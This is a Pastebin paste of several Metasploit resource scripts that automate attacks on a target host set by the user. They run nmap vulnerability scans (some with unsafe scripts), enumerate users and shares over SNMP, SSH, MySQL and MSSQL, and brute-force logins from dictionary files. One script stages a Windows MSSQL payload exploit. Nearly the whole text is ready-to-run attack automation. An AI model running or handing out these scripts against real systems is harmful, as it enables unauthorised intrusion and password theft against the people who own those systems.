API tools faq
paste
Advertisement
r00t-3xp10it

[ scanner.rc ] common-services -> scannner/exploiter

r00t-3xp10it
Feb 27th, 2015
601
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 7.81 KB | None | 0 0
raw download clone embed print report
  1. # The following resource file (scanner.rc) requires the user to set Rhosts globally
  2. # using: setg RHOSTS 192.168.1.68 (ip target) before launching the resource file,
  3. # and it uses the commando 'db_nmap' to save the scan done in metasploit database.
  4. # the tag <ruby> use nmap to scan by vulnerabilities in protocol smb and samba and
  5. # will be stored in 'services' and 'vulns', after the </ruby> tag The resource file
  6. # will use the results contained in the DB to run modules post-exploitation.
  7. #
  8. # befor lunch resource file:  msf > setg RHOSTS <target target target>
  9. # run  resource file:  msf > resource scanner.rc
  10. # unset global variable: msf > unsetg RHOSTS
  11. # clean msf database: msf > hosts -d
  12.  
  13.  
  14. [scanner.rc]
  15. -----------------------------------------------------------------------------------------------------------------------
  16. <ruby>
  17. run_single("db_nmap -sU -sS -Pn -O -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
  18. </ruby>
  19. use auxiliary/scanner/snmp/snmp_enum
  20. run
  21. use auxiliary/scanner/snmp/snmp_enumusers
  22. run
  23. use auxiliary/scanner/snmp/snmp_enumshares
  24. run
  25. hosts
  26. services
  27. use auxiliary/scanner/snmp/snmp_login
  28. show options
  29. -----------------------------------------------------------------------------------------------------------------------
  30.  
  31.  
  32.  
  33. # The following resource file (scanner[multi].rc) requires the user to set Rhosts globally
  34. # using: setg RHOSTS 192.168.1.68 (ip target) and USER_FILE (path-to-dicionary-file)
  35. # before launching the resource file, it uses the commando 'db_nmap' to save the scans
  36. # done in metasploit database. the tag <ruby> use nmap to scan by vulnerabilities in
  37. # protocol: telnet | ssh | mysql |mssql | pop3 | ftp | after the </ruby> tag The
  38. # resource file will use the results contained in the DB to run auxiliary modules.
  39. #
  40. # befor lunch resource file:  msf > setg RHOSTS <target target target>
  41. # befor lunch resource file:  msf > setg USER_FILE /root/brute-force.txt
  42. # run  resource file:  msf > resource scanner[multi].rc
  43. # unset global variable: msf > unsetg RHOSTS
  44. # unset global variable: msf > unsetg USER_FILE
  45. # clean msf database: msf > hosts -d
  46.  
  47.  
  48. [scanner[multi].rc]
  49. -----------------------------------------------------------------------------------------------------------------------
  50. <ruby>
  51. run_single("db_nmap -T3 -sS -Pn --script vuln,banner.nse,smb-check-vulns.nse,dns-brute.nse,ssh-hostkey.nse,ip-geolocation-geoplugin.nse --open --reason -p 21,22,23,995,1433,3306,5432 #{framework.datastore['RHOSTS']}")
  52. </ruby>
  53.  
  54. use auxiliary/scanner/telnet/telnet_version
  55. run
  56. use auxiliary/scanner/mysql/mysql_version
  57. run
  58. use auxiliary/scanner/pop3/pop3_version
  59. run
  60. use auxiliary/scanner/ftp/ftp_version
  61. run
  62. use auxiliary/scanner/ftp/anonymous
  63. run
  64. use auxiliary/scanner/ssh/ssh_version
  65. run
  66. use auxiliary/scanner/ssh/ssh_enumusers
  67. run
  68. use auxiliary/scanner/mssql/mssql_ping
  69. run
  70. hosts
  71. services
  72. creds
  73. -----------------------------------------------------------------------------------------------------------------------
  74.  
  75.  
  76.  
  77. # The following resource file (scanner[ms-sql].rc) requires the user to set Rhosts globally
  78. # using: setg RHOSTS 192.168.1.68 (ip target) and PASS_FILE (path-to-dicionary-file)
  79. # before launching the resource file, it uses the commando 'db_nmap' to save the scans
  80. # done in metasploit database. the tag <ruby> use nmap to scan by vulnerabilities in
  81. # protocol:| mssql | and try to exploit using nmap, after the </ruby> tag The
  82. # resource file will use the results contained in the DB to run auxiliary modules.
  83. #
  84. # befor lunch resource file:  msf > setg RHOSTS <target target target>
  85. # befor lunch resource file:  msf > setg MSSQL_PASS_FILE /root/brute.txt
  86. # run  resource file:  msf > resource scanner[ms-sql].rc
  87. # unset global variable: msf > unsetg RHOSTS
  88. # unset global variable: msf > unsetg MSSQL_PASS_FILE
  89. # clean msf database: msf > hosts -d
  90.  
  91.  
  92. [scanner[ms-sql].rc]
  93. -----------------------------------------------------------------------------------------------------------------------
  94. <ruby>
  95. run_single("db_nmap -T3 -sS -O -Pn --script vuln,ms-sql-info.nse,ms-sql-empty-password.nse,broadcast-ms-sql-discover.nse,ip-geolocation-geoplugin.nse --open --reason -p 1433 #{framework.datastore['RHOSTS']}")
  96. run_single("db_nmap --script ms-sql-brute.nse --script-args userdb=brute.txt,passdb=brute.txt -p 1433 #{framework.datastore['RHOSTS']}")
  97. </ruby>
  98. use auxiliary/scanner/mssql/mssql_ping
  99. run
  100. use auxiliary/scanner/mssql/mssql_login
  101. run
  102. hosts
  103. services
  104. use exploit/windows/mssql/mssql_payload
  105. show options
  106.  
  107. -----------------------------------------------------------------------------------------------------------------------
  108.  
  109. # The following resource file (scanner[ssh].rc) requires the user to set Rhosts globally
  110. # using: setg RHOSTS 192.168.1.68 (ip target) and USERPASS_FILE (path-to-dicionary-file)
  111. # before launching the resource file, it uses the commando 'db_nmap' to save the scans
  112. # done in metasploit database. the tag <ruby> use nmap to scan by vulnerabilities in
  113. # protocol:| ssh | and try to exploit using nmap, after the </ruby> tag The
  114. # resource file will use the results contained in the DB to run auxiliary modules.
  115. #
  116. # befor lunch resource file:  msf > setg RHOSTS <target target target>
  117. # befor lunch resource file:  msf > setg USER_FILE /root/brute.txt
  118. # befor lunch resource file:  msf > setg USERPASS_FILE /root/brute.txt
  119. # run  resource file:  msf > resource scanner[ssh].rc
  120. # unset global variable: msf > unsetg RHOSTS
  121. # unset global variable: msf > unsetg USER_FILE
  122. # unset global variable: msf > unsetg USERPASS_FILE
  123. # clean msf database: msf > hosts -d
  124.  
  125.  
  126. [scanner[ssh].rc]
  127. -----------------------------------------------------------------------------------------------------------------------
  128. <ruby>
  129. run_single("db_nmap -T3 -sS -Pn -O --script vuln,ssh-hostkey.nse,ssh2-enum-algos.nse,ip-geolocation-geoplugin.nse --open --reason -p 22 #{framework.datastore['RHOSTS']}")
  130. </ruby>
  131. use auxiliary/scanner/ssh/ssh_version
  132. run
  133. use auxiliary/scanner/ssh/ssh_enumusers
  134. run
  135. hosts
  136. services
  137. use auxiliary/scanner/ssh/ssh_login
  138. show options
  139. -----------------------------------------------------------------------------------------------------------------------
  140.  
  141. # The following resource file (scanner[mysql].rc) requires the user to set Rhosts globally
  142. # using: setg RHOSTS 192.168.1.68 (ip target) and PASS_FILE and USER_FILE (path-to-dicionary-file)
  143. # before launching the resource file, it uses the commando 'db_nmap' to save the scans
  144. # done in metasploit database. the tag <ruby> use nmap to scan by vulnerabilities in
  145. # protocol:| mysql | and try to exploit using nmap, after the </ruby> tag The
  146. # resource file will use the results contained in the DB to run auxiliary modules.
  147. #
  148. # befor lunch resource file:  msf > setg RHOSTS <target target target>
  149. # befor lunch resource file:  msf > setg USER_FILE /root/brute.txt
  150. # befor lunch resource file:  msf > setg PASS_FILE /root/brute.txt
  151. # run  resource file:  msf > resource scanner[mysql].rc
  152. # unset global variable: msf > unsetg RHOSTS
  153. # unset global variable: msf > unsetg USER_FILE
  154. # unset global variable: msf > unsetg PASS_FILE
  155. # clean msf database: msf > hosts -d
  156.  
  157.  
  158. [scanner[mysql].rc]
  159. -----------------------------------------------------------------------------------------------------------------------
  160. <ruby>
  161. run_single("db_nmap -T3 -sS -Pn -O --script vuln,mysql-info.nse,mysql-enum.nse,mysql-empty-password.nse,ip-geolocation-geoplugin.nse --open --reason -p 3306 #{framework.datastore['RHOSTS']}")
  162. </ruby>
  163. use auxiliary/scanner/mysql/mysql_version
  164. run
  165. use auxiliary/scanner/mysql/mysql_login
  166. run
  167. hosts
  168. services
  169. use auxiliary/admin/mysql/mysql_enum
  170. show options
  171. -----------------------------------------------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!